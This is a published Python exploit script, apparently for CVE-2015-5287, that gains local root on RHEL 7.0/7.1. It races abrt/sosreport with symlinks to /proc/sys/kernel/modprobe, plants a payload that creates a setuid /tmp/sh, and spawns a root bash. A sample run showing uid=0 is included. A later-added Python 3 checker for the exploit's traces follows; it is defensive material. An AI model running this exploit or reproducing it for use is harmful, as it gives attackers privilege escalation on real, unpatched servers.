RHEL 7.0/7.1 - abrt/sosreport Local Root
Source: rebel at pulltheplug.org  Author: rebel  Published: 2015-12-02
#!/usr/bin/python
# CVE-2015-5287 (?)
# abrt/sosreport RHEL 7.0/7.1 local root
# rebel 09/2015
 
# [user@localhost ~]$ python sosreport-rhel7.py
# crashing pid 19143
# waiting for dump directory
# dump directory:  /var/tmp/abrt/ccpp-2015-11-30-19:41:13-19143
# waiting for sosreport directory
# sosreport:  sosreport-localhost.localdomain-20151130194114
# waiting for tmpfiles
# tmpfiles:  ['tmpurfpyY', 'tmpYnCfnQ']
# moving directory
# moving tmpfiles
# tmpurfpyY -> tmpurfpyY.old
# tmpYnCfnQ -> tmpYnCfnQ.old
# waiting for sosreport to finish (can take several minutes)........................................done
# success
# bash-4.2# id
# uid=0(root) gid=1000(user) groups=0(root),1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
# bash-4.2# cat /etc/redhat-release
# Red Hat Enterprise Linux Server release 7.1 (Maipo)
 
import os,sys,glob,time,sys,socket
 
payload = "#!/bin/sh\ncp /bin/sh /tmp/sh\nchmod 6755 /tmp/sh\n"
 
pid = os.fork()
 
if pid == 0:
    os.execl("/usr/bin/sleep","sleep","100")
 
time.sleep(0.5)
 
print "crashing pid %d" % pid
 
os.kill(pid,11)
 
print "waiting for dump directory"
 
def waitpath(p):
    while 1:
        r = glob.glob(p)
        if len(r) > 0:
            return r
        time.sleep(0.05)   
 
dumpdir = waitpath("/var/tmp/abrt/cc*%d" % pid)[0]
 
print "dump directory: ", dumpdir
 
os.chdir(dumpdir)
 
print "waiting for sosreport directory"
 
sosreport = waitpath("sosreport-*")[0]
 
print "sosreport: ", sosreport
 
print "waiting for tmpfiles"
tmpfiles = waitpath("tmp*")
 
print "tmpfiles: ", tmpfiles
 
print "moving directory"
 
os.rename(sosreport, sosreport + ".old")
os.mkdir(sosreport)
os.chmod(sosreport,0777)
 
os.mkdir(sosreport + "/sos_logs")
os.chmod(sosreport + "/sos_logs",0777)
 
os.symlink("/proc/sys/kernel/modprobe",sosreport + "/sos_logs/sos.log")
os.symlink("/proc/sys/kernel/modprobe",sosreport + "/sos_logs/ui.log")
 
print "moving tmpfiles"
 
for x in tmpfiles:
    print "%s -> %s" % (x,x + ".old")
    os.rename(x, x + ".old")
    open(x, "w+").write("/tmp/hax.sh\n")
    os.chmod(x,0666)
 
 
os.chdir("/")
 
sys.stderr.write("waiting for sosreport to finish (can take several minutes)..")
 
 
def trigger():
    open("/tmp/hax.sh","w+").write(payload)
    os.chmod("/tmp/hax.sh",0755)
    try: socket.socket(socket.AF_INET,socket.SOCK_STREAM,132)
    except: pass
    time.sleep(0.5)
    try:
        os.stat("/tmp/sh")
    except:
        print "could not create suid"
        sys.exit(-1)
    print "success"
    os.execl("/tmp/sh","sh","-p","-c",'''echo /sbin/modprobe > /proc/sys/kernel/modprobe;rm -f /tmp/sh;python -c "import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');"''')
    sys.exit(-1)
 
for x in xrange(0,60*10):
    if "/tmp/hax" in open("/proc/sys/kernel/modprobe").read():
        print "done"
        trigger()
    time.sleep(1)
    sys.stderr.write(".")
 
print "timed out"
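
A host-side check for the traces the script above leaves behind, added here as an example and not part of rebel's original code. It looks for symlinks or world-writable entries under the abrt dump root, a changed /proc/sys/kernel/modprobe value, and a setuid file at /tmp/sh. The function names are hypothetical, the default paths are the ones used in the script, and treating any world-writable entry as suspicious is an assumption. It is written for Python 3.

```python
import os
import stat

# Value the script on this page writes back after it finishes.
EXPECTED_MODPROBE = "/sbin/modprobe"

def check_modprobe(path="/proc/sys/kernel/modprobe", expected=EXPECTED_MODPROBE):
    """Return a finding if the kernel module helper path is not the expected one."""
    try:
        with open(path) as fh:
            value = fh.read().strip()
    except OSError:
        return None
    return None if value == expected else "kernel.modprobe is %r" % value

def scan_dump_root(root="/var/tmp/abrt"):
    """List symlinks and world-writable entries inside abrt dump directories."""
    findings = []
    # followlinks=False: never descend through a planted symlink.
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)  # lstat inspects the link itself
            except OSError:
                continue
            if stat.S_ISLNK(st.st_mode):
                findings.append(("symlink", full, os.readlink(full)))
            elif st.st_mode & stat.S_IWOTH:  # heuristic, labelled as an assumption
                findings.append(("world-writable", full, oct(st.st_mode & 0o7777)))
    return findings

def check_setuid_shell(path="/tmp/sh"):
    """Report a setuid or setgid regular file at the path the payload creates."""
    try:
        st = os.lstat(path)
    except OSError:
        return None
    if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
        return "setuid/setgid file at %s owned by uid %d" % (path, st.st_uid)
    return None

if __name__ == "__main__":
    for finding in scan_dump_root():
        print(*finding)
    for result in (check_modprobe(), check_setuid_shell()):
        if result:
            print(result)
```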
 